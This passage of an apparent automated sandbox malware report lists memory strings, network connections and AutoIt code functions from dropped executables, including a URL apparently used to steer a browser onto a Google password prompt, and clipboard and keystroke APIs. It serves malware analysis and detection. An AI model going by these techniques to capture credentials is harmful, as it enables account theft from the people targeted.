Source: firefox.exe, 00000018.00000002.2818447104.000002BA59DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2734749303.000002BA634DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA634D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA63403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000018.00000002.2881483129.000002BA634F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA637D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889075369.00002786E1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63756000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797999061.000002BA55DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2781567528.000000D7800BC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000018.00000003.2742255243.000002BA5A163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: ae5cfd188c.exe, 00000007.00000003.2546663307.0000000005715000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A429000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000018.00000002.2794739483.000002BA5544E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: ae5cfd188c.exe, 00000007.00000003.2546663307.0000000005715000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000018.00000002.2794739483.000002BA5544E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/s
Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885242531.000010DF2E030000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000018.00000002.2795803239.000002BA555DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/4
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A70A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000018.00000002.2864606177.000002BA5D4EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791688549.000002BA49A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791760719.000002BA49A19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA55443000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2731037127.000002BA5C0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F1A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784518284.000001B8C5114000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 
0000001A.00000002.2782423918.000001B8C4F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781901454.000001AF5A3B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000016.00000002.2642169411.000001D3456C7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2652441512.000001BD98D80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791760719.000002BA49A19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000018.00000002.2793027167.000002BA4B4E2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2793027167.000002BA4B4BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784518284.000001B8C5114000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781901454.000001AF5A3B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2782554796.000001AF5A544000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: 2ada66c192.exe, 0000000B.00000003.2692799251.0000000001092000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2690178414.000000000108D000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000002.2697938782.0000000001096000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2694374109.0000000001092000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwde
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49898 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_006EEAFF
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_006EED6A
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 11_2_006DAA57
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00709576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_00709576

System Summary

Source: 2ada66c192.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_47284277-4
Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0c647206-b
Source: 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_1303e518-c
